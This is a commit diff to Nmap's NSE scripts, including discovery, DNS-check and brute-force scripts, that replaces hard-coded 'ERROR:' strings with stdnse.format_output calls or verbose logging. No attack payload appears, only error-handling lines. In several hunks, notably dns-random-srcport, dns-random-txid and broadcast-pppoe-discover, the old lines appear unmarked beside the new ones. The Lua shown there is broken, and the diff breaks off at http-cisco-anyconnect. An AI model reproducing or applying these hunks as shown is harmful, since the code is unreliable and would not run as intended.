Remove many ERROR outputs from non-debug NSE output

2025-12-06 04:31:29 +00:00 · 2015-08-27 20:43:55 +00:00
parent fb5c947453
commit 7852fa3c18
137 changed files with 334 additions and 380 deletions
--- a/scripts/ajp-auth.nse
+++ b/scripts/ajp-auth.nse
@@ -30,13 +30,11 @@ portrule = shortport.port_or_service(8009, 'ajp13', 'tcp')
 local arg_path = stdnse.get_script_args(SCRIPT_NAME .. ".path")
 local function fail(err) return ("\n  ERROR: %s"):format(err or "") end
 action = function(host, port)
  local helper = ajp.Helper:new(host, port)
  if ( not(helper:connect()) ) then
-    return fail("Failed to connect to AJP server")
+    return stdnse.format_output(false, "Failed to connect to AJP server")
  end
  local status, answer = helper:get(arg_path or "/")
--- a/scripts/ajp-brute.nse
+++ b/scripts/ajp-brute.nse
@@ -35,7 +35,7 @@ portrule = shortport.port_or_service(8009, 'ajp13', 'tcp')
 local arg_url = stdnse.get_script_args(SCRIPT_NAME .. ".path") or "/"
-local function fail(err) return ("\n  ERROR: %s"):format(err or "") end
+local function fail(err) return stdnse.format_output(false, err) end
 Driver = {
--- a/scripts/ajp-headers.nse
+++ b/scripts/ajp-headers.nse
@@ -31,8 +31,6 @@ categories = {"discovery", "safe"}
 local arg_path   = stdnse.get_script_args(SCRIPT_NAME .. '.path') or "/"
 local function fail(err) return ("\n  ERROR: %s"):format(err or "") end
 action = function(host, port)
  local method
  local helper = ajp.Helper:new(host, port)
@@ -42,7 +40,7 @@ action = function(host, port)
  helper:close()
  if ( not(status) ) then
-    return fail("Failed to retrieve server headers")
+    return stdnse.format_output(false, "Failed to retrieve server headers")
  end
  return stdnse.format_output(true, response.rawheaders)
 end
--- a/scripts/ajp-methods.nse
+++ b/scripts/ajp-methods.nse
@@ -51,13 +51,11 @@ local function filter_out(t, filter)
  return result
 end
 local function fail(err) return ("\n  ERROR: %s"):format(err or "") end
 action = function(host, port)
  local helper = ajp.Helper:new(host, port)
  if ( not(helper:connect()) ) then
-    return fail("Failed to connect to server")
+    return stdnse.format_output(false, "Failed to connect to server")
  end
  local status, response = helper:options(arg_url)
--- a/scripts/ajp-request.nse
+++ b/scripts/ajp-request.nse
@@ -52,7 +52,7 @@ local arg_file     = stdnse.get_script_args(SCRIPT_NAME .. ".filename")
 local arg_username = stdnse.get_script_args(SCRIPT_NAME .. ".username")
 local arg_password = stdnse.get_script_args(SCRIPT_NAME .. ".password")
-local function fail(err) return ("\n  ERROR: %s"):format(err or "") end
+local function fail(err) return stdnse.format_output(false, err) end
 action = function(host, port)
--- a/scripts/bitcoin-getaddr.nse
+++ b/scripts/bitcoin-getaddr.nse
@@ -38,23 +38,25 @@ categories = {"discovery", "safe"}
 portrule = shortport.port_or_service(8333, "bitcoin", "tcp" )
 local function fail(err) return stdnse.format_output(false, err) end
 action = function(host, port)
  local bcoin = bitcoin.Helper:new(host, port, { timeout = 20000 })
  local status = bcoin:connect()
  if ( not(status) ) then
-    return "\n  ERROR: Failed to connect to server"
+    return fail("Failed to connect to server")
  end
  local status, ver = bcoin:exchVersion()
  if ( not(status) ) then
-    return "\n  ERROR: Failed to extract version information"
+    return fail("Failed to extract version information")
  end
  local status, nodes = bcoin:getNodes()
  if ( not(status) ) then
-    return "\n  ERROR: Failed to extract address information"
+    return fail("Failed to extract address information")
  end
  bcoin:close()
--- a/scripts/bitcoin-info.nse
+++ b/scripts/bitcoin-info.nse
@@ -35,6 +35,8 @@ categories = {"discovery", "safe"}
 portrule = shortport.port_or_service(8333, "bitcoin", "tcp" )
 local function fail(err) return stdnse.format_output(false, err) end
 action = function(host, port)
  local NETWORK = {
@@ -46,12 +48,12 @@ action = function(host, port)
  local status = bcoin:connect()
  if ( not(status) ) then
-    return "\n  ERROR: Failed to connect to server"
+    return fail("Failed to connect to server")
  end
  local status, ver = bcoin:exchVersion()
  if ( not(status) ) then
-    return "\n  ERROR: Failed to extract version information"
+    return fail("Failed to extract version information")
  end
  bcoin:close()
--- a/scripts/bjnp-discover.nse
+++ b/scripts/bjnp-discover.nse
@@ -37,7 +37,7 @@ portrule = shortport.portnumber({8611, 8612}, "udp")
 action = function(host, port)
  local helper = bjnp.Helper:new(host, port)
  if ( not(helper:connect()) ) then
-    return "\n  ERROR: Failed to connect to server"
+    return stdnse.format_output(false, "Failed to connect to server")
  end
  local status, attrs
  if ( port.number == 8611 ) then
--- a/scripts/broadcast-ataoe-discover.nse
+++ b/scripts/broadcast-ataoe-discover.nse
@@ -117,24 +117,22 @@ local function sendConfigInfoRequest(iface)
  dnet:ethernet_close()
 end
 local function fail(err) return ("\n  ERROR: %s"):format(err or "") end
 action = function()
  local iname = nmap.get_interface()
  if ( not(iname) ) then
-    stdnse.debug1("No interface supplied, use -e")
+    stdnse.verbose1("No interface supplied, use -e")
    return
  end
  if ( not(nmap.is_privileged()) ) then
-    stdnse.debug1("not running for lack of privileges")
+    stdnse.verbose1("not running for lack of privileges")
    return
  end
  local iface = nmap.get_interface_info(iname)
  if ( not(iface) ) then
-    return fail("Failed to retrieve interface information")
+    return stdnse.format_output(false, "Failed to retrieve interface information")
  end
  local pcap = nmap.new_socket()
--- a/scripts/broadcast-dhcp-discover.nse
+++ b/scripts/broadcast-dhcp-discover.nse
@@ -149,6 +149,8 @@ local commasep = {
  end
 }
 local function fail (err) return stdnse.format_output(false, err) end
 action = function()
  local host, port = "255.255.255.255", 67
@@ -173,7 +175,7 @@ action = function()
    interfaces = getInterfaces("ethernet", "up")
  end
-  if( not(interfaces) ) then return "\n  ERROR: Failed to retrieve interfaces (try setting one explicitly using -e)" end
+  if( not(interfaces) ) then return fail("Failed to retrieve interfaces (try setting one explicitly using -e)") end
  local transaction_id = bin.pack("<I", math.random(0, 0x7FFFFFFF))
  local request_type = dhcp.request_types["DHCPDISCOVER"]
@@ -182,7 +184,7 @@ action = function()
  -- we need to set the flags to broadcast
  local request_options, overrides, lease_time = nil, { flags = 0x8000 }, nil
  local status, packet = dhcp.dhcp_build(request_type, ip_address, mac, nil, request_options, overrides, lease_time, transaction_id)
-  if (not(status)) then return "\n  ERROR: Failed to build packet" end
+  if (not(status)) then return fail("Failed to build packet") end
  local threads = {}
  local result = {}
--- a/scripts/broadcast-eigrp-discovery.nse
+++ b/scripts/broadcast-eigrp-discovery.nse
@@ -192,6 +192,8 @@ local asListener = function(interface, timeout, astab)
  condvar("signal")
 end
 local function fail (err) return stdnse.format_output(false, err) end
 action = function()
  -- Get script arguments
  local as = stdnse.get_script_args(SCRIPT_NAME .. ".as")
@@ -205,7 +207,7 @@ action = function()
  -- K params should be of length 6
  -- Cisco routers ignore eigrp packets that don't have matching K parameters
  if #kparams < 6 or #kparams > 6 then
-    return "\n ERROR: kparams should be of size 6."
+    return fail("kparams should be of size 6.")
  else
    k = {}
    k[1] = string.sub(kparams, 1,1)
@@ -221,7 +223,7 @@ action = function()
    -- If an interface was provided, get its information
    interface = nmap.get_interface_info(interface)
    if not interface then
-      return ("\n ERROR: Failed to retrieve %s interface information."):format(interface)
+      return fail(("Failed to retrieve %s interface information."):format(interface))
    end
    interfaces = {interface}
    stdnse.debug1("Will use %s interface.", interface.shortname)
@@ -264,7 +266,7 @@ action = function()
      stdnse.debug1("Will use %s A.S value.", astab[1])
      as = astab[1]
    else
-      return "\n ERROR: Couldn't get an A.S value."
+      return fail("Couldn't get an A.S value.")
    end
  end
--- a/scripts/broadcast-igmp-discovery.nse
+++ b/scripts/broadcast-igmp-discovery.nse
@@ -333,7 +333,7 @@ action = function(host, port)
    -- Get the interface information
    interface = nmap.get_interface_info(interface)
    if not interface then
-      return ("ERROR: Failed to retrieve %s interface information."):format(interface)
+      return stdnse.format_output(false, ("Failed to retrieve %s interface information."):format(interface))
    end
    interfaces = {interface}
    stdnse.debug1("Will use %s interface.", interface.shortname)
--- a/scripts/broadcast-listener.nse
+++ b/scripts/broadcast-listener.nse
@@ -105,14 +105,14 @@ loadDecoders = function(fname)
  local abs_fname = nmap.fetchfile(fname)
  if ( not(abs_fname) ) then
-    return false, ("ERROR: Failed to load decoder definition (%s)"):format(fname)
+    return false, ("Failed to load decoder definition (%s)"):format(fname)
  end
  local env = setmetatable({Decoders = {}}, {__index = _G});
  local file = loadfile(abs_fname, "t", env)
  if(not(file)) then
    stdnse.debug1("Couldn't load decoder file: %s", fname)
-    return false, "ERROR: Couldn't load decoder file: " .. fname
+    return false, "Couldn't load decoder file: " .. fname
  end
  file()
@@ -120,7 +120,7 @@ loadDecoders = function(fname)
  local d = env.Decoders
  if ( d ) then return true, d end
-  return false, "ERROR: Failed to load decoders"
+  return false, "Failed to load decoders"
 end
 ---
@@ -223,6 +223,8 @@ getInterfaces = function(link, up)
  return result
 end
 local function fail (err) return stdnse.format_output(false, err) end
 action = function()
  local DECODERFILE = "nselib/data/packetdecoders.lua"
@@ -234,7 +236,7 @@ action = function()
    local iinfo, err = nmap.get_interface_info(iface)
    if ( not(iinfo.address) ) then
-      return "\n  ERROR: The IP address of the interface could not be determined ..."
+      return fail("The IP address of the interface could not be determined")
    end
    interfaces = { { name = iface, address = iinfo.address } }
@@ -245,12 +247,12 @@ action = function()
  -- make sure we have at least one interface to start sniffing
  if ( #interfaces == 0 ) then
-    return "\n  ERROR: Could not determine any valid interfaces"
+    return fail("Could not determine any valid interfaces")
  end
  -- load the decoders from file
  local status, Decoders = loadDecoders(DECODERFILE)
-  if ( not(status) ) then return "\n  " .. Decoders end
+  if ( not(status) ) then return fail(Decoders) end
  -- create a local table to handle instantiated decoders
  local decodertab = { udp = {}, ether = {} }
--- a/scripts/broadcast-networker-discover.nse
+++ b/scripts/broadcast-networker-discover.nse
@@ -58,8 +58,6 @@ local function Callit( host, port, program, protocol )
  return true, results
 end
 local function fail(err) return ("\n  ERROR: %s"):format(err or "") end
 action = function()
  local results = {}
@@ -80,7 +78,7 @@ action = function()
    -- warn about problematic sends on OS X requiring the interface to be
    -- supplied as part of IPv6
    if ( not(status) and results == "Portmap.Callit: Failed to send data" ) then
-      return fail("Failed sending data, try supplying the correct interface using -e")
+      return stdnse.format_output(false, "Failed sending data, try supplying the correct interface using -e")
    end
    if ( status ) then
--- a/scripts/broadcast-pc-anywhere.nse
+++ b/scripts/broadcast-pc-anywhere.nse
@@ -39,7 +39,7 @@ action = function()
  for i=1,2 do
    local status = socket:sendto(host, port, "NQ")
    if ( not(status) ) then
-      return "\n  ERROR: Failed to send broadcast request"
+      return stdnse.format_output(false, "Failed to send broadcast request")
    end
  end
--- a/scripts/broadcast-pc-duo.nse
+++ b/scripts/broadcast-pc-duo.nse
@@ -44,7 +44,7 @@ local function udpProbe(probe, responses)
  for i=1,2 do
    local status = socket:sendto(probe.host, probe.port, probe.data)
    if ( not(status) ) then
-      return "\n  ERROR: Failed to send broadcast request"
+      return stdnse.format_output(false, "Failed to send broadcast request")
    end
  end
--- a/scripts/broadcast-pim-discovery.nse
+++ b/scripts/broadcast-pim-discovery.nse
@@ -159,7 +159,7 @@ action = function()
    interface = getInterface(mcast)
  end
  if not interface then
-    return ("\n ERROR: Couldn't get interface for %s"):format(mcast)
+    return stdnse.format_output(false, ("Couldn't get interface for %s"):format(mcast))
  end
  stdnse.debug1("will send via %s interface.", interface.shortname)
--- a/scripts/broadcast-pppoe-discover.nse
+++ b/scripts/broadcast-pppoe-discover.nse
@@ -43,9 +43,7 @@ prerule = function()
 end
 local function fail(err)
-  if ( err ) then
+  return stdnse.format_output(false, err)
    return ("\n  ERROR: %s"):format(err)
  end
 end
 local function discoverPPPoE(helper)
--- a/scripts/broadcast-ripng-discover.nse
+++ b/scripts/broadcast-ripng-discover.nse
@@ -147,7 +147,7 @@ RIPng = {
  }
 }
-local function fail(err) return ("\n  ERROR: %s"):format(err or "") end
+local function fail(err) return stdnse.format_output(false, err) end
 -- Parses a RIPng response
 -- @return ret string containing the routing table
--- a/scripts/broadcast-sybase-asa-discover.nse
+++ b/scripts/broadcast-sybase-asa-discover.nse
@@ -171,7 +171,7 @@ action = function()
  local status, instances = helper:ping()
  if ( not(status) ) then
-    return ("\n  ERROR: %s"):format(instances)
+    return stdnse.format_output(false, instances)
  end
  -- if we don't have any instances, silently abort
--- a/scripts/broadcast-tellstick-discover.nse
+++ b/scripts/broadcast-tellstick-discover.nse
@@ -27,15 +27,13 @@ categories = {"broadcast", "safe"}
 prerule = function() return ( nmap.address_family() == 'inet' ) end
 local function fail(err) return ("\n  ERROR: %s"):format(err or "") end
 action = function()
  local socket = nmap.new_socket("udp")
  local host, port = { ip = "255.255.255.255" }, { number = 30303, protocol = "udp" }
  socket:set_timeout(5000)
  if ( not(socket:sendto(host, port, "D")) ) then
-    return fail("Failed to send discovery request to server")
+    return stdnse.format_output(false, "Failed to send discovery request to server")
  end
  local output = {}
--- a/scripts/broadcast-wake-on-lan.nse
+++ b/scripts/broadcast-wake-on-lan.nse
@@ -39,6 +39,7 @@ local function createWOLPacket(mac)
  return "\xff\xff\xff\xff\xff\xff" .. string.rep(bin.pack("H", mac), 16)
 end
 local function fail (err) return stdnse.format_output(false, err) end
 action = function()
@@ -48,7 +49,7 @@ action = function()
  elseif( MAC:match("%x%x%-%x%x%-%x%x%-%x%x%-%x%x%-%x%x") ) then
    MAC_hex = MAC:gsub("-", "")
  else
-    return "\n  ERROR: Failed to process MAC address"
+    return fail("Failed to process MAC address")
  end
  local host = { ip = address or "255.255.255.255" }
@@ -60,7 +61,7 @@ action = function()
    local packet = createWOLPacket(MAC_hex)
    local status, err = socket:sendto(host, port, packet)
    if ( not(status) ) then
-      return "\n  ERROR: Failed to send packet"
+      return fail("Failed to send packet")
    end
  end
  return stdnse.format_output(true, ("Sent WOL packet to: %s"):format(MAC))
--- a/scripts/broadcast-wpad-discover.nse
+++ b/scripts/broadcast-wpad-discover.nse
@@ -192,13 +192,15 @@ local function dhcpDiscover()
 end
 local function fail (err) return stdnse.format_output(false, err) end
 action = function()
  local status, response, wpad
  if ( arg_nodhcp and arg_nodns ) then
-    return "\n  ERROR: Both nodns and nodhcp arguments were supplied"
+    stdnse.verbose1("Both nodns and nodhcp arguments were supplied")
    return fail("Both nodns and nodhcp arguments were supplied")
  end
  if ( nmap.is_privileged() and not(arg_nodhcp) ) then
@@ -213,7 +215,7 @@ action = function()
    status, response = dnsDiscover()
    if ( not(status) ) then
      local services = "DNS" .. ( nmap.is_privileged() and "/DHCP" or "" )
-      return ("\n  ERROR: Could not find WPAD using %s"):format(services)
+      return fail(("Could not find WPAD using %s"):format(services))
    end
    wpad = ("http://%s/wpad.dat"):format( response.name )
  end
--- a/scripts/cups-info.nse
+++ b/scripts/cups-info.nse
@@ -43,13 +43,11 @@ categories = {"safe", "discovery"}
 portrule = shortport.port_or_service(631, "ipp", "tcp", "open")
 local function fail(err) return ("\n  ERROR: %s"):format(err or "") end
 action = function(host, port)
  local helper = ipp.Helper:new(host, port)
  if ( not(helper:connect()) ) then
-    return fail("Failed to connect to server")
+    return stdnse.format_output(false, "Failed to connect to server")
  end
  local status, printers = helper:getPrinters()
--- a/scripts/cups-queue-info.nse
+++ b/scripts/cups-queue-info.nse
@@ -34,12 +34,10 @@ categories = {"safe", "discovery"}
 portrule = shortport.port_or_service(631, "ipp", "tcp", "open")
 local function fail(err) return ("\n  ERROR: %s"):format(err or "") end
 action = function(host, port)
  local helper = ipp.Helper:new(host, port)
  if ( not(helper:connect()) ) then
-    return fail("Failed to connect to server")
+    return stdnse.format_output(false, "Failed to connect to server")
  end
  local output = helper:getQueueInfo()
--- a/scripts/cvs-brute-repository.nse
+++ b/scripts/cvs-brute-repository.nse
@@ -100,7 +100,7 @@ action = function(host, port)
  if ( repofile ) then
    f = io.open( repofile, "r" )
    if ( not(f) ) then
-      return ("\n  ERROR: Failed to open repository file: %s"):format(repofile)
+      return stdnse.format_output(false, ("Failed to open repository file: %s"):format(repofile))
    end
  end
--- a/scripts/cvs-brute.nse
+++ b/scripts/cvs-brute.nse
@@ -91,7 +91,7 @@ action = function(host, port)
  local repo = stdnse.get_script_args("cvs-brute.repo") and
    { stdnse.get_script_args("cvs-brute.repo") } or
    getDiscoveredRepos(host)
-  if ( not(repo) ) then return "\n  ERROR: No CVS repository specified (see cvs-brute.repo)" end
+  if ( not(repo) ) then stdnse.verbose1("ERROR: No CVS repository specified (see cvs-brute.repo)") end
  local status, result
--- a/scripts/dict-info.nse
+++ b/scripts/dict-info.nse
@@ -37,7 +37,7 @@ categories = {"discovery", "safe"}
 portrule = shortport.port_or_service(2628, "dict", "tcp")
-local function fail(err) return ("\n  ERROR: %s"):format(err or "") end
+local function fail(err) return stdnse.format_output(false, err) end
 action = function(host, port)
  local socket = nmap.new_socket()
--- a/scripts/distcc-cve2004-2687.nse
+++ b/scripts/distcc-cve2004-2687.nse
@@ -49,7 +49,7 @@ portrule = shortport.port_or_service(3632, "distcc")
 local arg_cmd = stdnse.get_script_args(SCRIPT_NAME .. '.cmd') or "id"
-local function fail(err) return ("\n  ERROR: %s"):format(err or "") end
+local function fail(err) return stdnse.format_output(false, err) end
 action = function(host, port)
--- a/scripts/dns-blacklist.nse
+++ b/scripts/dns-blacklist.nse
@@ -109,17 +109,19 @@ local function formatResult(result)
  return output
 end
 local function fail (err) return stdnse.format_output(false, err) end
 dnsblAction = function(host)
  local helper
  if ( arg_services and ( not(arg_category) or "all" == arg_category:lower() ) ) then
-    return "\n  ERROR: A service filter can't be used without a specific category"
+    return fail("A service filter can't be used without a specific category")
  elseif( "all" ~= arg_category ) then
    helper = dnsbl.Helper:new(arg_category, arg_mode)
    helper:setFilter(arg_services)
    local status, err = helper:validateFilter()
    if ( not(status) ) then
-      return ("\n  ERROR: %s"):format(err)
+      return fail(("%s"):format(err))
    end
  end
@@ -153,11 +155,11 @@ end
 action = function(...)
  if ( arg_mode ~= "short" and arg_mode ~= "long" ) then
-    return "\n  ERROR: Invalid argument supplied, mode should be either 'short' or 'long'"
+    return fail("Invalid argument supplied, mode should be either 'short' or 'long'")
  end
  if ( arg_IP and not(ipOps.todword(arg_IP)) ) then
-    return "\n  ERROR: Invalid IP address was supplied"
+    return fail("Invalid IP address was supplied")
  end
  -- if the list argument was given, just list the services and abort
--- a/scripts/dns-client-subnet-scan.nse
+++ b/scripts/dns-client-subnet-scan.nse
@@ -330,12 +330,10 @@ local get_addresses = function(address, mask, domain, nameserver, port)
  return resp
 end
 local function fail(err) return ("\n  ERROR: %s"):format(err or "") end
 action = function(host, port)
  if ( not(argDomain) ) then
-    return fail(SCRIPT_NAME .. ".domain was not specified")
+    return stdnse.format_output(false, SCRIPT_NAME .. ".domain was not specified")
  end
  local nameserver = (host and host.ip) or argNS
--- a/scripts/dns-random-srcport.nse
+++ b/scripts/dns-random-srcport.nse
@@ -3,6 +3,7 @@ local comm = require "comm"
 local nmap = require "nmap"
 local shortport = require "shortport"
 local string = require "string"
 local stdnse = require "stdnse"
 description = [[
 Checks a DNS server for the predictable-port recursion vulnerability.
@@ -43,6 +44,8 @@ categories = {"external", "intrusive"}
 portrule = shortport.portnumber(53, "udp")
 local function fail (err) return stdnse.format_output(false, err) end
 action = function(host, port)
  -- TXID: 0xbeef
@@ -75,11 +78,7 @@ action = function(host, port)
  -- Fail gracefully
  if not status then
-    if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then
+    return fail(result)
      return "ERROR: TIMEOUT"
    else
      return
    end
  end
  -- Update the port
@@ -89,40 +88,24 @@ action = function(host, port)
  -- We need a minimum of 5 bytes...
  if (#result < 5) then
-    if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then
+    return fail("Malformed response")
      return "ERROR: Malformed response"
    else
      return
    end
  end
  -- Check TXID
  if (string.byte(result, 1) ~= 0xbe
      or string.byte(result, 2) ~= 0xef) then
-    if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then
+    return fail("Invalid Transaction ID")
      return "ERROR: Invalid Transaction ID"
    else
      return
    end
  end
  -- Check response flag and recursion
  if not (bit.band(string.byte(result, 3), 0x80) == 0x80
      and bit.band(string.byte(result, 4), 0x80) == 0x80) then
-    if (nmap.verbosity() >= 1 or nmap.debugging() >= 1) then
+    return fail("Server refused recursion")
      return "ERROR: Server refused recursion"
    else
      return
    end
  end
  -- Check error flag
  if (bit.band(string.byte(result, 4), 0x0F) ~= 0x00) then
-    if (nmap.verbosity() >= 1 or nmap.debugging() >= 1) then
+    return fail("Server failure")
      return "ERROR: Server failure"
    else
      return
    end
  end
  -- Check for two Answer RRs and 1 Authority RR
@@ -130,20 +113,12 @@ action = function(host, port)
      or string.byte(result, 6) ~= 0x01
      or string.byte(result, 7) ~= 0x00
      or string.byte(result, 8) ~= 0x02) then
-    if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then
+    return fail("Response did not include expected answers")
      return "ERROR: Response did not include expected answers"
    else
      return
    end
  end
  -- We need a minimum of 128 bytes...
  if (#result < 128) then
-    if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then
+    return fail("Truncated response")
      return "ERROR: Truncated response"
    else
      return
    end
  end
  -- Here is the really fragile part.  If the DNS response changes
@@ -155,21 +130,13 @@ action = function(host, port)
  if (string.byte(result, 118) ~= 0x00
      or string.byte(result, 119) ~= 0x10)
    then
-    if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then
+    return fail("Answer record not of type TXT")
      return "ERROR: Answer record not of type TXT"
    else
      return
    end
  end
  -- Check for IN
  if (string.byte(result, 120) ~= 0x00
      or string.byte(result, 121) ~= 0x01) then
-    if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then
+    return fail("Answer record not of type IN")
      return "ERROR: Answer record not of type IN"
    else
      return
    end
  end
  -- Get TXT length
@@ -177,11 +144,7 @@ action = function(host, port)
  -- We now need a minimum of 128 + txtlen bytes + 1...
  if (#result < 128 + txtlen) then
-    if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then
+    return fail("Truncated response")
      return "ERROR: Truncated response"
    else
      return
    end
  end
  -- GET TXT record
--- a/scripts/dns-random-txid.nse
+++ b/scripts/dns-random-txid.nse
@@ -3,6 +3,7 @@ local comm = require "comm"
 local nmap = require "nmap"
 local shortport = require "shortport"
 local string = require "string"
 local stdnse = require "stdnse"
 description = [[
 Checks a DNS server for the predictable-TXID DNS recursion
@@ -43,6 +44,8 @@ categories = {"external", "intrusive"}
 portrule = shortport.portnumber(53, "udp")
 local function fail (err) return stdnse.format_output(false, err) end
 action = function(host, port)
  -- TXID: 0xbabe
@@ -75,11 +78,7 @@ action = function(host, port)
  -- Fail gracefully
  if not status then
-    if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then
+    return fail(result)
      return "ERROR: TIMEOUT"
    else
      return
    end
  end
  -- Update the port
@@ -89,40 +88,24 @@ action = function(host, port)
  -- We need a minimum of 5 bytes...
  if (#result < 5) then
-    if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then
+    return fail("Malformed response")
      return "ERROR: Malformed response"
    else
      return
    end
  end
  -- Check TXID
  if (string.byte(result, 1) ~= 0xba
      or string.byte(result, 2) ~= 0xbe) then
-    if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then
+    return fail("Invalid Transaction ID")
      return "ERROR: Invalid Transaction ID"
    else
      return
    end
  end
  -- Check response flag and recursion
  if not (bit.band(string.byte(result, 3), 0x80) == 0x80
      and bit.band(string.byte(result, 4), 0x80) == 0x80) then
-    if (nmap.verbosity() >= 1 or nmap.debugging() >= 1) then
+    return fail("Server refused recursion")
      return "ERROR: Server refused recursion"
    else
      return
    end
  end
  -- Check error flag
  if (bit.band(string.byte(result, 4), 0x0F) ~= 0x00) then
-    if (nmap.verbosity() >= 1 or nmap.debugging() >= 1) then
+    return fail("Server failure")
      return "ERROR: Server failure"
    else
      return
    end
  end
  -- Check for two Answer RRs and 1 Authority RR
@@ -130,20 +113,12 @@ action = function(host, port)
      or string.byte(result, 6) ~= 0x01
      or string.byte(result, 7) ~= 0x00
      or string.byte(result, 8) ~= 0x02) then
-    if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then
+    return fail("Response did not include expected answers")
      return "ERROR: Response did not include expected answers"
    else
      return
    end
  end
  -- We need a minimum of 128 bytes...
  if (#result < 128) then
-    if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then
+    return fail("Truncated response")
      return "ERROR: Truncated response"
    else
      return
    end
  end
  -- Here is the really fragile part.  If the DNS response changes
@@ -155,21 +130,13 @@ action = function(host, port)
  if (string.byte(result, 118) ~= 0x00
      or string.byte(result, 119) ~= 0x10)
    then
-    if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then
+    return fail("Answer record not of type TXT")
      return "ERROR: Answer record not of type TXT"
    else
      return
    end
  end
  -- Check for IN
  if (string.byte(result, 120) ~= 0x00
      or string.byte(result, 121) ~= 0x01) then
-    if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then
+    return fail("Answer record not of type IN")
      return "ERROR: Answer record not of type IN"
    else
      return
    end
  end
  -- Get TXT length
@@ -177,11 +144,7 @@ action = function(host, port)
  -- We now need a minimum of 128 + txtlen bytes + 1...
  if (#result < 128 + txtlen) then
-    if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then
+    return fail("Truncated response")
      return "ERROR: Truncated response"
    else
      return
    end
  end
  -- GET TXT record
--- a/scripts/dns-srv-enum.nse
+++ b/scripts/dns-srv-enum.nse
@@ -81,8 +81,6 @@ local function parseSvcList(services)
  end
 end
 local function fail(err) return ("\n  ERROR: %s"):format(err or "") end
 local function parseSrvResponse(resp)
  local i = 1
  if ( resp.answers ) then
@@ -153,7 +151,7 @@ action = function(host)
  }
  if ( not(checkFilter(services)) ) then
-    return fail(("Invalid filter (%s) was supplied"):format(arg_filter))
+    return stdnse.format_output(false, ("Invalid filter (%s) was supplied"):format(arg_filter))
  end
  local threads, result = {}, {}
--- a/scripts/dns-update.nse
+++ b/scripts/dns-update.nse
@@ -100,7 +100,7 @@ action = function(host, port)
    nmap.set_port_state(host, port, "open")
    return stdnse.format_output(true, result)
  elseif ( err ) then
-    return "\n  ERROR: " .. err
+    return stdnse.format_output(false, err)
  end
 end
--- a/scripts/domcon-cmd.nse
+++ b/scripts/domcon-cmd.nse
@@ -96,6 +96,8 @@ local function readAPIBlock( socket )
 end
 local function fail (err) return stdnse.format_output(false, err) end
 action = function(host, port)
  local socket = nmap.new_socket()
@@ -104,9 +106,9 @@ action = function(host, port)
  local pass = stdnse.get_script_args('domcon-cmd.pass')
  local cmd = stdnse.get_script_args('domcon-cmd.cmd')
-  if( not(cmd) ) then return "  \n  ERROR: No command supplied (see domcon-cmd.cmd)" end
+  if( not(cmd) ) then return fail("No command supplied (see domcon-cmd.cmd)") end
-  if( not(user)) then return "  \n  ERROR: No username supplied (see domcon-cmd.user)" end
+  if( not(user)) then return fail("No username supplied (see domcon-cmd.user)") end
-  if( not(pass)) then return "  \n  ERROR: No password supplied (see domcon-cmd.pass)" end
+  if( not(pass)) then return fail("No password supplied (see domcon-cmd.pass)") end
  cmds = stdnse.strsplit(";%s*", cmd)
@@ -128,7 +130,7 @@ action = function(host, port)
      result_part.name = cmds[i]
      table.insert( result, result_part )
    else
-      return "  \n  ERROR: " .. result_part
+      return fail(result_part)
    end
  end
--- a/scripts/giop-info.nse
+++ b/scripts/giop-info.nse
@@ -1,5 +1,6 @@
 local giop = require "giop"
 local shortport = require "shortport"
 local stdnse = require "stdnse"
 description = [[
 Queries a CORBA naming server for a list of objects.
@@ -57,6 +58,7 @@ local fmt_meta = {
  end
 }
 local function fail (err) return stdnse.format_output(false, err) end
 action = function(host, port)
  local helper = giop.Helper:new( host, port )
@@ -66,10 +68,10 @@ action = function(host, port)
  if ( not(status) ) then return err end
  status, ctx = helper:GetNamingContext()
-  if ( not(status) ) then return "  \n  ERROR: " .. ctx end
+  if ( not(status) ) then return fail(ctx) end
  status, objs = helper:ListObjects(ctx)
-  if ( not(status) ) then return "  \n  ERROR: " .. objs end
+  if ( not(status) ) then return fail(objs) end
  for _, obj in ipairs( objs ) do
    setmetatable(obj, fmt_meta)
--- a/scripts/gkrellm-info.nse
+++ b/scripts/gkrellm-info.nse
@@ -52,7 +52,7 @@ categories = {"discovery", "safe"}
 portrule = shortport.port_or_service(19150, "gkrellm", "tcp")
-local function fail(err) return ("\n  ERROR: %s"):format(err or "") end
+local function fail(err) return stdnse.format_output(false, err) end
 local long_names = {
  ["fs_mounts"] = "Mounts",
--- a/scripts/gpsd-info.nse
+++ b/scripts/gpsd-info.nse
@@ -50,7 +50,7 @@ local function hasAllData(gpsinfo)
  return true
 end
-local function fail(err) return ("\n  ERROR: %s"):format(err or "") end
+local function fail(err) return stdnse.format_output(false, err) end
 action = function(host, port)
--- a/scripts/http-auth-finder.nse
+++ b/scripts/http-auth-finder.nse
@@ -78,7 +78,7 @@ action = function(host, port)
    -- most of them are "legitimate" and should not be reason to abort
    if ( not(status) ) then
      if ( r.err ) then
-        return stdnse.format_output(true, ("ERROR: %s"):format(r.reason))
+        return stdnse.format_output(false, r.reason)
      else
        break
      end
--- a/scripts/http-backup-finder.nse
+++ b/scripts/http-backup-finder.nse
@@ -100,7 +100,7 @@ action = function(host, port)
    -- most of them are "legitimate" and should not be reason to abort
    if ( not(status) ) then
      if ( r.err ) then
-        return stdnse.format_output(true, "ERROR: %s", r.reason)
+        return stdnse.format_output(false, r.reason)
      else
        break
      end
--- a/scripts/http-brute.nse
+++ b/scripts/http-brute.nse
@@ -127,7 +127,7 @@ action = function( host, port )
  local method = string.upper(stdnse.get_script_args("http-brute.method") or "GET")
  if ( not(path) ) then
-    return "  \n  ERROR: No path was specified (see http-brute.path)"
+    return stdnse.format_output(false, "No path was specified (see http-brute.path)")
  end
  local response = http.generic_request( host, port, method, path, { no_cache = true } )
--- a/scripts/http-cisco-anyconnect.nse
